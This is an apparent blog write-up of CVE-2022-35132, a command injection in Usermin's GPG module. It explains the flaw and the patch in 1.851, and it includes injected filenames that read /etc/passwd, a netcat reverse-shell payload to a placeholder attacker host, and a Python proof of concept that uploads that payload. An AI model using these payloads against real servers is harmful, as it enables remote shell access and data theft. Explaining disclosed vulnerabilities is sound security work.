CVE-2022-35132 - Command Injection Vulnerability in Usermin’s GPG Module Explained (with Exploit Details)

---

Introduction

Security vulnerabilities often lurk in places you least expect. In this exclusive long read, we’ll deep-dive into CVE-2022-35132, a critical command injection vulnerability discovered in Usermin through version 1.850. If you use Usermin, especially with GPG operations, this is something you should not ignore.

We’ll cover what the bug is, how it can be exploited, sample code, and what you should do next.

What Is Usermin?

Usermin is a web-based interface for regular users. It’s usually used alongside Webmin for system management. Many sysadmins let end-users access email, file functions, change passwords, and even manage GPG keys through this tool.

Where: During manipulation of key-related filenames for GPG operations

Reference:  
- MITRE CVE Detail  
- NVD NIST  
- Exploit Database

How Does the Vulnerability Work?

This bug lives in how Usermin passes filenames to the system shell when it performs certain GPG actions. If an attacker places special shell characters inside a filename (for example, includes ;, $, or |), they can manipulate the shell command and run whatever system command they want—but *only* if they are already logged in.

Malicious user logs into Usermin.

2. They upload or create a GPG key or file with a malicious name—like evil.txt; cat /etc/passwd

Usermin runs an unsafe system command with this filename.

4. The injected command (cat /etc/passwd) is run on the server with the privileges of Usermin.

Here’s a pseudo-code example inspired by the vulnerable code

# User-supplied filename from GPG module
my $filename = get_user_input();

# BAD: Directly using user input in a system call
system("gpg --import $filename");

Suppose a user sets $filename to

"key.asc; ls / > /tmp/leak.txt"

The system runs

gpg --import key.asc; ls / > /tmp/leak.txt

Now, ls / is executed after importing the key! You can imagine the risk if the attacker puts any malicious command there.

Real Exploit Example

Let’s see what an actual exploit might look like in bash (for demo purposes). Imagine you have access to a Usermin account. You try to *import* a key file named:

"pwn.asc; nc -e /bin/sh attacker.example.com 4444"

If your Usermin server does not restrict nc or outbound connections, this could spawn a reverse shell.

Python Proof-of-Concept

import requests

url = 'https://your-usermin-server/gpg-import.cgi';
session = requests.Session()

# Authenticate (replace with your own credentials)
session.post(url='/session_login.cgi', data={
    'user': 'YOURUSER',
    'pass': 'YOURPASS'
})

# Malicious file name
files = {
    'key': ('pwn.asc; nc -e /bin/sh attacker_server 4444', b'GPG KEY CONTENT')
}

# Send the upload request
resp = session.post(url, files=files)
print(resp.status_code, resp.text)

(Replace attacker_server with your own server to catch the shell)

Responsible Disclosure and Patch

The Usermin developers fixed the issue in version 1.851. Update as soon as possible!

- Changelog
- GitHub commit fixing the bug

Conclusion

CVE-2022-35132 is a classic, yet very dangerous, command-injection bug. If you allow any user to access Usermin’s GPG module on an unpatched system, they could easily escalate their privileges, exfiltrate data, or take over the server. Updating is critical.

For further reading and verification, check out

- NVD Entry
- Exploit-DB PoC #51099  
- Usermin official website

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:55:00 UTC